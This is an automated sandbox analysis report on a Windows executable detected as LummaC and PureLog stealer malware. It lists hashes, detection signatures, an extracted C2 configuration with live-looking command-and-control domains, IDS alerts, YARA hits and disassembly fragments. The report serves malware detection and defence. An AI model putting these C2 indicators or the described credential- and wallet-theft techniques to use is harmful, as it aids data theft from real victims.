Edit tour

Windows Analysis Report
MCxU5Fj.exe

Overview

General Information

Sample name:	MCxU5Fj.exe
Analysis ID:	1629892
MD5:	641525fe17d5e9d483988eff400ad129
SHA1:	8104fa08cfcc9066df3d16bfa1ebe119668c9097
SHA256:	7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a
Tags:	176-113-115-7exeuser-JAMESWT_MHT
Infos:

Detection

LummaC Stealer, PureLog Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to modify clipboard data

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

MCxU5Fj.exe (PID: 7464 cmdline: "C:\Users\user\Desktop\MCxU5Fj.exe" MD5: 641525FE17D5E9D483988EFF400AD129)

MCxU5Fj.exe (PID: 7528 cmdline: "C:\Users\user\Desktop\MCxU5Fj.exe" MD5: 641525FE17D5E9D483988EFF400AD129)

WerFault.exe (PID: 7616 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 916 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["circujitstorm.bet", "explorebieology.run", "gadgethgfub.icu", "moderzysics.top", "techmindzs.live", "codxefusion.top", "phygcsforum.life", "techspherxe.top"], "Build id": "yau6Na--7481626938"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
MCxU5Fj.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.1406285774.0000000000EB2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.2650627998.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000002.1470843231.0000000004339000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1470843231.0000000004339000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
Process Memory Space: MCxU5Fj.exe PID: 7528	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: MCxU5Fj.exe PID: 7528	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author
2.2.MCxU5Fj.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
2.2.MCxU5Fj.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0.2.MCxU5Fj.exe.4339550.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.0.MCxU5Fj.exe.eb0000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.MCxU5Fj.exe.4339550.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.MCxU5Fj.exe.4339550.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
Click to see the 1 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T09:12:33.117619+0100	2028371	3	Unknown Traffic	192.168.2.8	49705	188.114.97.3	443	TCP
2025-03-05T09:12:33.782535+0100	2028371	3	Unknown Traffic	192.168.2.8	49706	188.114.97.3	443	TCP
2025-03-05T09:12:36.019518+0100	2028371	3	Unknown Traffic	192.168.2.8	49709	188.114.97.3	443	TCP
2025-03-05T09:12:41.242856+0100	2028371	3	Unknown Traffic	192.168.2.8	49713	188.114.97.3	443	TCP
2025-03-05T09:12:42.333860+0100	2028371	3	Unknown Traffic	192.168.2.8	49714	188.114.97.3	443	TCP
2025-03-05T09:12:43.609797+0100	2028371	3	Unknown Traffic	192.168.2.8	49715	188.114.97.3	443	TCP
2025-03-05T09:12:44.926572+0100	2028371	3	Unknown Traffic	192.168.2.8	49716	188.114.97.3	443	TCP
2025-03-05T09:12:56.434737+0100	2028371	3	Unknown Traffic	192.168.2.8	49720	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T09:12:33.297481+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49705	188.114.97.3	443	TCP
2025-03-05T09:12:35.354812+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49706	188.114.97.3	443	TCP
2025-03-05T09:12:56.901565+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49720	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T09:12:33.297481+0100	2049836	1	A Network Trojan was detected	192.168.2.8	49705	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (circujitstorm .bet in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T09:12:33.117619+0100	2060529	1	Domain Observed Used for C2 Detected	192.168.2.8	49705	188.114.97.3	443	TCP
2025-03-05T09:12:33.782535+0100	2060529	1	Domain Observed Used for C2 Detected	192.168.2.8	49706	188.114.97.3	443	TCP
2025-03-05T09:12:36.019518+0100	2060529	1	Domain Observed Used for C2 Detected	192.168.2.8	49709	188.114.97.3	443	TCP
2025-03-05T09:12:41.242856+0100	2060529	1	Domain Observed Used for C2 Detected	192.168.2.8	49713	188.114.97.3	443	TCP
2025-03-05T09:12:42.333860+0100	2060529	1	Domain Observed Used for C2 Detected	192.168.2.8	49714	188.114.97.3	443	TCP
2025-03-05T09:12:43.609797+0100	2060529	1	Domain Observed Used for C2 Detected	192.168.2.8	49715	188.114.97.3	443	TCP
2025-03-05T09:12:44.926572+0100	2060529	1	Domain Observed Used for C2 Detected	192.168.2.8	49716	188.114.97.3	443	TCP
2025-03-05T09:12:56.434737+0100	2060529	1	Domain Observed Used for C2 Detected	192.168.2.8	49720	188.114.97.3	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (circujitstorm .bet)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T09:12:32.577720+0100	2060528	1	Domain Observed Used for C2 Detected	192.168.2.8	63047	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T09:12:44.033527+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.8	49715	188.114.97.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://circujitstorm.bet/api	Avira URL Cloud: Label: malware
Source: https://circujitstorm.bet/	Avira URL Cloud: Label: malware
Source: https://circujitstorm.bet:443/api	Avira URL Cloud: Label: malware
Source: https://circujitstorm.bet/apiPP5	Avira URL Cloud: Label: malware
Source: phygcsforum.life	Avira URL Cloud: Label: malware
Source: https://circujitstorm.bet:443/apiMicrosoft	Avira URL Cloud: Label: malware
Source: moderzysics.top	Avira URL Cloud: Label: malware
Source: circujitstorm.bet	Avira URL Cloud: Label: malware
Source: https://circujitstorm.bet/api9	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.1470843231.0000000004339000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["circujitstorm.bet", "explorebieology.run", "gadgethgfub.icu", "moderzysics.top", "techmindzs.live", "codxefusion.top", "phygcsforum.life", "techspherxe.top"], "Build id": "yau6Na--7481626938"}

Multi AV Scanner detection for submitted file

Source: MCxU5Fj.exe	Virustotal: Detection: 58%			Perma Link
Source: MCxU5Fj.exe	ReversingLabs: Detection: 65%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 96.4% probability

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1470843231.0000000004339000.00000004.00000800.00020000.00000000.sdmp	String decryptor: circujitstorm.bet
Source: 00000000.00000002.1470843231.0000000004339000.00000004.00000800.00020000.00000000.sdmp	String decryptor: explorebieology.run
Source: 00000000.00000002.1470843231.0000000004339000.00000004.00000800.00020000.00000000.sdmp	String decryptor: gadgethgfub.icu
Source: 00000000.00000002.1470843231.0000000004339000.00000004.00000800.00020000.00000000.sdmp	String decryptor: moderzysics.top
Source: 00000000.00000002.1470843231.0000000004339000.00000004.00000800.00020000.00000000.sdmp	String decryptor: techmindzs.live
Source: 00000000.00000002.1470843231.0000000004339000.00000004.00000800.00020000.00000000.sdmp	String decryptor: codxefusion.top
Source: 00000000.00000002.1470843231.0000000004339000.00000004.00000800.00020000.00000000.sdmp	String decryptor: phygcsforum.life
Source: 00000000.00000002.1470843231.0000000004339000.00000004.00000800.00020000.00000000.sdmp	String decryptor: techspherxe.top

Source: C:\Users\user\Desktop\MCxU5Fj.exe

Code function: 2_2_0041BF0B CryptUnprotectData,

2_2_0041BF0B

Source: MCxU5Fj.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49720 version: TLS 1.2

Source: MCxU5Fj.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: Politic.pdb source: MCxU5Fj.exe, WERC21C.tmp.dmp.5.dr
Source:	Binary string: System.Windows.Forms.pdb source: WERC21C.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdb source: WERC21C.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdbRSDS source: WERC21C.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdb\| source: WERC21C.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdb source: WERC21C.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERC21C.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdb source: WERC21C.tmp.dmp.5.dr
Source:	Binary string: System.pdb source: WERC21C.tmp.dmp.5.dr

Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], esi	2_2_0044F070
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then mov word ptr [ecx], bx	2_2_00450020
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+49A2CD6Ch]	2_2_0041B090
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], C0F3A0E1h	2_2_0041B090
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	2_2_0041B090
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then mov edx, dword ptr [ecx+esi+3Ch]	2_2_0044A990
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F7D6D3F6h	2_2_00450260
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then mov dword ptr [esp+04h], esi	2_2_00446A00
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then mov dword ptr [esp+04h], ecx	2_2_00446A00
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+537D9614h]	2_2_0044FAE0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+3E2A0804h]	2_2_0044FAE0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then mov dword ptr [esp+04h], ecx	2_2_00430B60
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+3E2A0808h]	2_2_00450580
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+ebx+0Ch]	2_2_0042D750
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then cmp word ptr [edi+ebx], 0000h	2_2_0044EF70
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+000002C0h]	2_2_0041BF0B
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then mov dword ptr [edi], esi	2_2_00401040
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+0B586EC2h]	2_2_00413070
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], B7070F87h	2_2_00413070
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+0B586EC2h]	2_2_00413070
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx]	2_2_00434076
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx eax, byte ptr [edi+edx-163AD48Eh]	2_2_0043781C
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+edx]	2_2_004268F0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-36B6188Ch]	2_2_0040D8F3
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+74h]	2_2_0041F888
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then jmp eax	2_2_0044A940
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_0041F978
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then cmp word ptr [eax+ecx+02h], 0000h	2_2_0041C9C2
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx]	2_2_004219D0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 6D58C181h	2_2_004219D0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then mov word ptr [edi], cx	2_2_0042A9E0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then mov esi, eax	2_2_0041C99C
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+04h]	2_2_0044E1A0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+18h]	2_2_0040CA00
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then mov ebp, eax	2_2_00408A10
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+0B586EC2h]	2_2_00411A10
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then mov eax, ebx	2_2_00436210
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then mov esi, dword ptr [esp+2Ch]	2_2_00431220
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then mov dword ptr [esp+04h], esi	2_2_0041DA38
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+30h]	2_2_0041DA38
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 61A44046h	2_2_0041DA38
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+02h]	2_2_0041DA38
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-28A0A10Eh]	2_2_004112C0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+000000E0h]	2_2_004112C0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+08h]	2_2_0044B2C0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+04h]	2_2_0044B2C0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+77F37574h]	2_2_0044B2C0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 9F1F8F53h	2_2_0044B2C0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then mov word ptr [ecx], dx	2_2_004242C5
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then mov word ptr [ecx], dx	2_2_004242DC
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	2_2_0040A290
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	2_2_0040A290
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx esi, bl	2_2_0044EAA0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+08h]	2_2_00421358
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+000002C0h]	2_2_0041C35E
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx+10h]	2_2_00447B30
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx+08h]	2_2_00447B30
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+04h]	2_2_00447B30
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx esi, bl	2_2_0044E3C0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+edi-788543D6h]	2_2_0040EBE0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then mov dword ptr [esp+04h], esi	2_2_0041D3E9
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-4ED1F4D6h]	2_2_0044C3EC
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	2_2_00430382
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	2_2_0042A3B0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-5F0AEF74h]	2_2_0042F3B9
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_00443440
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+74h]	2_2_0041F446
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then mov byte ptr [edx], al	2_2_0043147E
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+0Ch]	2_2_004204C0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 656D2358h	2_2_004204C0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	2_2_0041E1CA
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then mov word ptr [eax], dx	2_2_0041E1CA
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx esi, bl	2_2_0044E4C0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx esi, bl	2_2_0044E4D9
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx esi, bl	2_2_0044E4DB
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+0Ch]	2_2_004204C0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 656D2358h	2_2_004204C0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	2_2_0041ECA8
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then mov word ptr [eax], dx	2_2_0041ECA8
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ebp-7417F396h]	2_2_0044F4B0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-2B031366h]	2_2_0041051A
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then mov byte ptr [eax], cl	2_2_0041FDC0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+74h]	2_2_0041FDC0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+74h]	2_2_0041FDC0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then cmp word ptr [edi], 0025h	2_2_004485F1
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+ebx+0000008Ch]	2_2_00432D90
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+0Ch]	2_2_0044CE5E
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+28h]	2_2_00433E60
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx esi, bl	2_2_0044E660
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then mov word ptr [esi], cx	2_2_00423E10
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax-2A023EB8h]	2_2_0042362A
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_004126D2
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then cmp dword ptr [ebx+ecx*8], 744E5843h	2_2_0044AEE0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+3E2A0808h]	2_2_004506E0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_00434EB0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-000000BCh]	2_2_00420F70
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-54h]	2_2_00420F70
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx esi, bl	2_2_0044E710
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movsx ecx, byte ptr [esi+eax]	2_2_0041AFC0
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+000002C0h]	2_2_0041BF80
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+74h]	2_2_0041F7A8
Source: C:\Users\user\Desktop\MCxU5Fj.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 7A542AABh	2_2_0044F7B0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2060528 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (circujitstorm .bet) : 192.168.2.8:63047 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2060529 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (circujitstorm .bet in TLS SNI) : 192.168.2.8:49713 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2060529 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (circujitstorm .bet in TLS SNI) : 192.168.2.8:49709 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2060529 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (circujitstorm .bet in TLS SNI) : 192.168.2.8:49716 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2060529 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (circujitstorm .bet in TLS SNI) : 192.168.2.8:49720 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2060529 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (circujitstorm .bet in TLS SNI) : 192.168.2.8:49714 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2060529 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (circujitstorm .bet in TLS SNI) : 192.168.2.8:49706 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2060529 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (circujitstorm .bet in TLS SNI) : 192.168.2.8:49715 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2060529 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (circujitstorm .bet in TLS SNI) : 192.168.2.8:49705 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49705 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49705 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49706 -> 188.114.97.3:443
